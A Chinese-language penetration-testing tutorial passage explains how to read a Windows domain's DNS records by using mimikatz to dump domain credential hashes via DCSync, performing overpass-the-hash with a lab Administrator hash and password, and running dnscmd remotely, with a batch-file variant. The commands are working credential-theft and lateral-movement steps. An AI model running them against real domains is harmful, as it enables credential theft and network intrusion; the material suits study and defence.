域渗透——DNS记录的获取(2)

域控制器上执行mimikatz:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit" 

实际测试

测试环境的参数如下：

• 域管理员用户：Administrator
• 口令：DomainAdmin456!
• hash：A55E0720F0041193632A58E007624B40

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40" 

这样会弹出一个cmd.exe

接着使用dnscmd远程连接进行查询：

Dnscmd WIN-F08C969D7FM.test.com /EnumZones 

or

Dnscmd WIN-F08C969D7FM /EnumZones 

注：这里要使用FQDN或者计算机名。

如下图：

如果想在命令行下实现整个流程，可以采用如下方法：

新建c:\test\1.bat，内容如下：

Dnscmd WIN-F08C969D7FM.test.com /EnumZones > c:\test\out.txt 

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:\"cmd.exe /c c:\test\1.bat\"" 

注：cmd.exe下"需要使用转义字符\"

0x05 小结

本文介绍了在域内使用Overpass-the-hash实现dnscmd远程读取DNS记录的方法。

【编辑推荐】

1. 适用于Windows，Linux和OS X的2018年优秀黑客工具
2. 什么是 DNS，为什么它与你有关？根证书又是啥？
3. 影响全国400万IP：家用路由器DNS遭篡改跳转黄赌网站
4. 常见的几种Windows后门持久化方式
5. 什么是DNS劫持攻击以及如何避免此类攻击？

（编辑：ASP站长网）